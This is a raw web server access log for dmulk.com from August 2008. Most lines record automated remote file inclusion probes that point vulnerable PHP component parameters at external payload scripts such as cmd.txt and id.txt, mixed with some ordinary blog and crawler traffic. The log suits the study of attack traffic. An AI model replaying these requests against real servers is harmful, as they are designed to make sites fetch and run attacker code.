217.198.149.178 - - [12/Aug/2008:10:30:47 -0700] "GET /logs/access_080305.log//admin/classes/TplLoad.php?full_path_to_public_program=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.198.149.178 - - [12/Aug/2008:10:30:47 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.198.149.178 - - [12/Aug/2008:10:30:47 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.198.149.178 - - [12/Aug/2008:10:30:48 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.198.149.178 - - [12/Aug/2008:10:30:48 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.199.235.196 - - [12/Aug/2008:10:30:48 -0700] "POST /blog/wp-admin/admin-ajax.php HTTP/1.1" 200 203 "http://dmulk.com/blog/wp-admin/post.php?action=edit&post=163&message=4" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
64.22.89.194 - - [12/Aug/2008:10:31:02 -0700] "GET /logs/access_080119.log/errors.php?error=http://www.unesc.br/phpblogger/system/disk.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
83.64.132.254 - - [12/Aug/2008:10:31:42 -0700] "GET /logs/access_080302.log//admin/business_inc/saveserver.php?thisdir=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
62.231.161.4 - - [12/Aug/2008:10:31:44 -0700] "GET /logs/access_080229.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://ugtcajamadrid.org/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
62.231.161.4 - - [12/Aug/2008:10:31:44 -0700] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://ugtcajamadrid.org/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
62.231.161.4 - - [12/Aug/2008:10:31:45 -0700] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://ugtcajamadrid.org/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
62.231.161.4 - - [12/Aug/2008:10:31:46 -0700] "GET /logs/access_080329.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://ugtcajamadrid.org/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
83.64.132.254 - - [12/Aug/2008:10:31:47 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootP=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
72.199.235.196 - - [12/Aug/2008:10:31:48 -0700] "POST /blog/wp-admin/admin-ajax.php HTTP/1.1" 200 203 "http://dmulk.com/blog/wp-admin/post.php?action=edit&post=163&message=4" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
200.72.251.210 - - [12/Aug/2008:10:31:50 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.luoghidellacultura.it/www//components/com_joomla-visites/cmd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
200.72.251.210 - - [12/Aug/2008:10:31:50 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.luoghidellacultura.it/www//components/com_joomla-visites/cmd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
69.73.189.205 - - [12/Aug/2008:10:31:59 -0700] "GET /logs/?mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 200 60283 "-" "libwww-perl/5.805" "www.dmulk.com"
69.73.189.205 - - [12/Aug/2008:10:32:01 -0700] "GET /logs/?mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 200 60283 "-" "libwww-perl/5.805" "www.dmulk.com"
69.73.189.205 - - [12/Aug/2008:10:32:01 -0700] "GET /?mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 200 18483 "-" "libwww-perl/5.805" "www.dmulk.com"
69.73.189.205 - - [12/Aug/2008:10:32:03 -0700] "GET /?mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 200 18499 "-" "libwww-perl/5.805" "www.dmulk.com"
217.198.149.178 - - [12/Aug/2008:10:32:19 -0700] "GET /logs/access_080306.log//admin/classes/TplLoad.php?full_path_to_public_program=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.198.149.178 - - [12/Aug/2008:10:32:19 -0700] "GET /logs/access_080306.log//admin/classes/TplLoad.php?full_path_to_public_program=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
190.54.62.66 - - [12/Aug/2008:10:32:29 -0700] "GET /logs/access_080229.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://primeraconchali.cl/modules/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
190.54.62.66 - - [12/Aug/2008:10:32:30 -0700] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://primeraconchali.cl/modules/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
190.54.62.66 - - [12/Aug/2008:10:32:30 -0700] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://primeraconchali.cl/modules/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
190.54.62.66 - - [12/Aug/2008:10:32:31 -0700] "GET /logs/access_080329.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://primeraconchali.cl/modules/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
190.54.62.66 - - [12/Aug/2008:10:32:43 -0700] "GET /logs/access_080325.log/errors.php?error=http://primeraconchali.cl/modules/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
190.54.62.66 - - [12/Aug/2008:10:32:44 -0700] "GET /xGB.php?act=admin&do=http://primeraconchali.cl/modules/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
190.54.62.66 - - [12/Aug/2008:10:32:44 -0700] "GET /logs/xGB.php?act=admin&do=http://primeraconchali.cl/modules/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
190.54.62.66 - - [12/Aug/2008:10:32:44 -0700] "GET /logs/access_080216.log/xGB.php?act=admin&do=http://primeraconchali.cl/modules/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.199.235.196 - - [12/Aug/2008:10:32:48 -0700] "POST /blog/wp-admin/admin-ajax.php HTTP/1.1" 200 203 "http://dmulk.com/blog/wp-admin/post.php?action=edit&post=163&message=4" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
83.64.132.254 - - [12/Aug/2008:10:32:49 -0700] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.64.132.254 - - [12/Aug/2008:10:32:51 -0700] "GET //components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.64.132.254 - - [12/Aug/2008:10:33:23 -0700] "GET /logs/access_080215.log//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.64.132.254 - - [12/Aug/2008:10:33:33 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
72.199.235.196 - - [12/Aug/2008:10:33:48 -0700] "POST /blog/wp-admin/admin-ajax.php HTTP/1.1" 200 203 "http://dmulk.com/blog/wp-admin/post.php?action=edit&post=163&message=4" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
200.150.189.10 - - [12/Aug/2008:10:34:10 -0700] "GET /logs/access_080207.log/errors.php?error=http://xvascainox7.sites.uol.com.br/v6.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.64.132.254 - - [12/Aug/2008:10:34:17 -0700] "GET /logs/access_080330.log//config/dbutil.bck.php?confdir=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
67.19.90.90 - - [12/Aug/2008:10:34:23 -0700] "GET /logs/home.php?x=http://www.devilhouse.org/dhwm/alb2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.19.90.90 - - [12/Aug/2008:10:34:23 -0700] "GET /home.php?x=http://www.devilhouse.org/dhwm/alb2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
202.60.72.69 - - [12/Aug/2008:10:34:37 -0700] "GET /logs/access_080325.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.geocities.com/dvlind/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.199.235.196 - - [12/Aug/2008:10:34:48 -0700] "POST /blog/wp-admin/admin-ajax.php HTTP/1.1" 200 203 "http://dmulk.com/blog/wp-admin/post.php?action=edit&post=163&message=4" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
67.222.143.140 - - [12/Aug/2008:10:35:29 -0700] "GET /logs/access_080122.log//content/multithumb/multithumb?mosConfig_absolute_path=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
67.222.143.140 - - [12/Aug/2008:10:35:30 -0700] "GET /logs/access_080122.log/errors.php?error=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
12.9.16.50 - - [12/Aug/2008:10:35:45 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0139_0.jpg HTTP/1.1" 200 344118 "http://www.vfrdiscussion.com/forum/index.php?showtopic=36984&hl=" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "dmulk.com"
69.42.218.66 - - [12/Aug/2008:10:35:46 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://h1.ripway.com/metaljaya/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
69.42.218.66 - - [12/Aug/2008:10:35:47 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://h1.ripway.com/metaljaya/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
72.199.235.196 - - [12/Aug/2008:10:35:48 -0700] "POST /blog/wp-admin/admin-ajax.php HTTP/1.1" 200 203 "http://dmulk.com/blog/wp-admin/post.php?action=edit&post=163&message=4" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
64.22.89.194 - - [12/Aug/2008:10:35:50 -0700] "GET /logs/access_080110.log//login.php?dir=http://www.unesc.br/phpblogger/system/disk.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.22.89.194 - - [12/Aug/2008:10:35:50 -0700] "GET //login.php?dir=http://www.unesc.br/phpblogger/system/disk.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.22.89.194 - - [12/Aug/2008:10:35:50 -0700] "GET /logs//login.php?dir=http://www.unesc.br/phpblogger/system/disk.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.22.89.194 - - [12/Aug/2008:10:35:54 -0700] "GET /logs/access_080126.log//login.php?dir=http://www.unesc.br/phpblogger/system/disk.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
67.222.143.140 - - [12/Aug/2008:10:36:15 -0700] "GET /logs/access_080229.log//content/multithumb/multithumb?mosConfig_absolute_path=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
67.222.143.140 - - [12/Aug/2008:10:36:15 -0700] "GET /logs/access_080229.log/errors.php?error=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
202.60.72.69 - - [12/Aug/2008:10:36:26 -0700] "GET /logs/access_080325.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.urdutimesusa.com/chicago/include/chk2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
205.151.125.66 - - [12/Aug/2008:10:36:30 -0700] "GET /logs/access_071129.log//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.degeheimedienst.nl/dgd/include/inc_act/sistcmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
205.151.125.66 - - [12/Aug/2008:10:36:31 -0700] "GET //modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.degeheimedienst.nl/dgd/include/inc_act/sistcmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
205.151.125.66 - - [12/Aug/2008:10:36:31 -0700] "GET /logs//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.degeheimedienst.nl/dgd/include/inc_act/sistcmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.199.235.196 - - [12/Aug/2008:10:36:48 -0700] "POST /blog/wp-admin/admin-ajax.php HTTP/1.1" 200 203 "http://dmulk.com/blog/wp-admin/post.php?action=edit&post=163&message=4" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
66.199.250.122 - - [12/Aug/2008:10:37:09 -0700] "GET /logs/access.log/errors.php?error=http://www.geocities.com/himar84/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.199.250.122 - - [12/Aug/2008:10:37:10 -0700] "GET /errors.php?error=http://www.geocities.com/himar84/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.199.250.122 - - [12/Aug/2008:10:37:10 -0700] "GET /logs/errors.php?error=http://www.geocities.com/himar84/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.222.143.140 - - [12/Aug/2008:10:37:39 -0700] "GET /logs/access_071228.log//content/multithumb/multithumb?mosConfig_absolute_path=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
67.222.143.140 - - [12/Aug/2008:10:37:40 -0700] "GET /logs/access_071228.log/errors.php?error=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
72.199.235.196 - - [12/Aug/2008:10:37:49 -0700] "POST /blog/wp-admin/admin-ajax.php HTTP/1.1" 200 203 "http://dmulk.com/blog/wp-admin/post.php?action=edit&post=163&message=4" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
190.54.62.66 - - [12/Aug/2008:10:37:51 -0700] "GET /logs//modules/xt_conteudo//admin/spaw/errors.php?error=http://primeraconchali.cl/modules/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
190.54.62.66 - - [12/Aug/2008:10:37:52 -0700] "GET //modules/xt_conteudo//admin/spaw/errors.php?error=http://primeraconchali.cl/modules/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.17.183 - - [12/Aug/2008:10:37:55 -0700] "GET /bikes/dteel/2008_01_27/?D=A HTTP/1.0" 200 5034 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
205.151.125.66 - - [12/Aug/2008:10:38:03 -0700] "GET /logs/access_080212.log//avatar.php?page=http://www.degeheimedienst.nl/dgd/include/inc_act/sistcmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
205.151.125.66 - - [12/Aug/2008:10:38:03 -0700] "GET //avatar.php?page=http://www.degeheimedienst.nl/dgd/include/inc_act/sistcmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
205.151.125.66 - - [12/Aug/2008:10:38:03 -0700] "GET /logs//avatar.php?page=http://www.degeheimedienst.nl/dgd/include/inc_act/sistcmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
205.151.125.66 - - [12/Aug/2008:10:38:09 -0700] "GET /logs/access.log//avatar.php?page=http://www.degeheimedienst.nl/dgd/include/inc_act/sistcmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.18.29.218 - - [12/Aug/2008:10:38:22 -0700] "GET /logs/access_080212.log//avatar.php?page=http://www.degeheimedienst.nl/dgd/include/inc_act/sistcmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.18.29.218 - - [12/Aug/2008:10:38:23 -0700] "GET //avatar.php?page=http://www.degeheimedienst.nl/dgd/include/inc_act/sistcmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.18.29.218 - - [12/Aug/2008:10:38:24 -0700] "GET /logs//avatar.php?page=http://www.degeheimedienst.nl/dgd/include/inc_act/sistcmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.22.89.194 - - [12/Aug/2008:10:38:25 -0700] "GET /logs//login.php?dir=http://www.unesc.br/phpblogger/system/disk.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.22.89.194 - - [12/Aug/2008:10:38:25 -0700] "GET //login.php?dir=http://www.unesc.br/phpblogger/system/disk.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
62.231.161.4 - - [12/Aug/2008:10:38:41 -0700] "GET /logs/access.log///modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://ugtcajamadrid.org/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
62.231.161.4 - - [12/Aug/2008:10:38:41 -0700] "GET ///modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://ugtcajamadrid.org/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
62.231.161.4 - - [12/Aug/2008:10:38:42 -0700] "GET /logs///modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://ugtcajamadrid.org/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
65.55.211.29 - - [12/Aug/2008:10:38:45 -0700] "GET /logs/access_080417.log HTTP/1.1" 304 - "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
72.199.235.196 - - [12/Aug/2008:10:38:49 -0700] "POST /blog/wp-admin/admin-ajax.php HTTP/1.1" 200 203 "http://dmulk.com/blog/wp-admin/post.php?action=edit&post=163&message=4" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
67.18.29.218 - - [12/Aug/2008:10:38:51 -0700] "GET /logs/access.log//avatar.php?page=http://www.degeheimedienst.nl/dgd/include/inc_act/sistcmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.15.80.42 - - [12/Aug/2008:10:39:03 -0700] "GET //skin/zero_vote/error.php?dir=http://www.shopbijou.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.15.80.42 - - [12/Aug/2008:10:39:03 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.shopbijou.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.15.80.42 - - [12/Aug/2008:10:39:04 -0700] "GET /logs/access_080324.log//skin/zero_vote/error.php?dir=http://www.shopbijou.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.15.80.42 - - [12/Aug/2008:10:39:04 -0700] "GET /logs/access_071228.log//skin/zero_vote/error.php?dir=http://www.shopbijou.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
210.87.251.48 - - [12/Aug/2008:10:39:08 -0700] "GET /logs//index.php?kobr=http://sac-altars.org/download/v6id.txt???? HTTP/1.0" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.87.251.47 - - [12/Aug/2008:10:39:10 -0700] "GET //index.php?kobr=http://sac-altars.org/download/v6id.txt???? HTTP/1.0" 200 18403 "-" "libwww-perl/5.79" "www.dmulk.com"
89.188.110.128 - - [12/Aug/2008:10:39:20 -0700] "GET /logs/access_080212.log//avatar.php?page=http://www.degeheimedienst.nl/dgd/include/inc_act/sistcmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.188.110.128 - - [12/Aug/2008:10:39:21 -0700] "GET //avatar.php?page=http://www.degeheimedienst.nl/dgd/include/inc_act/sistcmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.188.110.128 - - [12/Aug/2008:10:39:21 -0700] "GET /logs//avatar.php?page=http://www.degeheimedienst.nl/dgd/include/inc_act/sistcmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.222.143.140 - - [12/Aug/2008:10:39:39 -0700] "GET /logs/access_080110.log//content/multithumb/multithumb?mosConfig_absolute_path=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
67.222.143.140 - - [12/Aug/2008:10:39:39 -0700] "GET /logs/access_080110.log/errors.php?error=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
89.188.110.128 - - [12/Aug/2008:10:39:40 -0700] "GET /logs/access.log//avatar.php?page=http://www.degeheimedienst.nl/dgd/include/inc_act/sistcmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
204.8.217.2 - - [12/Aug/2008:10:39:41 -0700] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.almeranissan.ru/administrator/components/com_autobb/mambo?? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
204.8.217.2 - - [12/Aug/2008:10:39:41 -0700] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.almeranissan.ru/administrator/components/com_autobb/mambo?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
67.19.104.82 - - [12/Aug/2008:10:39:44 -0700] "GET /errors.php?error=http://www.ezdesigns.net/geeklog/plugins/spamx/Mic22.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.19.104.82 - - [12/Aug/2008:10:39:44 -0700] "GET /errors.php?error=http://www.ezdesigns.net/geeklog/plugins/spamx/Mic22.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
205.151.125.66 - - [12/Aug/2008:10:39:48 -0700] "GET /logs//avatar.php?page=http://www.degeheimedienst.nl/dgd/include/inc_act/sistcmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
205.151.125.66 - - [12/Aug/2008:10:39:48 -0700] "GET //avatar.php?page=http://www.degeheimedienst.nl/dgd/include/inc_act/sistcmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.199.235.196 - - [12/Aug/2008:10:39:49 -0700] "POST /blog/wp-admin/admin-ajax.php HTTP/1.1" 200 203 "http://dmulk.com/blog/wp-admin/post.php?action=edit&post=163&message=4" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
67.19.104.82 - - [12/Aug/2008:10:39:51 -0700] "GET /errors.php?error=http://www.ezdesigns.net/geeklog/plugins/spamx/Mic22.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
190.54.62.66 - - [12/Aug/2008:10:40:12 -0700] "GET /logs/access_080215.log/xGB.php?act=admin&do=http://primeraconchali.cl/modules/idar.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
190.54.62.66 - - [12/Aug/2008:10:40:14 -0700] "GET /xGB.php?act=admin&do=http://primeraconchali.cl/modules/idar.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
190.54.62.66 - - [12/Aug/2008:10:40:15 -0700] "GET /logs/xGB.php?act=admin&do=http://primeraconchali.cl/modules/idar.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
190.54.62.66 - - [12/Aug/2008:10:40:15 -0700] "GET /logs/access_080216.log/xGB.php?act=admin&do=http://primeraconchali.cl/modules/idar.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.199.250.122 - - [12/Aug/2008:10:40:48 -0700] "GET /logs/access_080324.log/errors.php?error=http://www.geocities.com/himar84/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.199.235.196 - - [12/Aug/2008:10:40:49 -0700] "POST /blog/wp-admin/admin-ajax.php HTTP/1.1" 200 203 "http://dmulk.com/blog/wp-admin/post.php?action=edit&post=163&message=4" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
190.54.62.66 - - [12/Aug/2008:10:40:55 -0700] "GET /logs//modules/xt_conteudo//admin/spaw/errors.php?error=http://primeraconchali.cl/modules/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
190.54.62.66 - - [12/Aug/2008:10:40:55 -0700] "GET //modules/xt_conteudo//admin/spaw/errors.php?error=http://primeraconchali.cl/modules/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.155.18.50 - - [12/Aug/2008:10:41:15 -0700] "GET /akocomments.php?mosConfig_absolute_path=http://www.shopbijou.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.155.18.50 - - [12/Aug/2008:10:41:15 -0700] "GET /logs/access_080103.log/akocomments.php?mosConfig_absolute_path=http://www.shopbijou.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
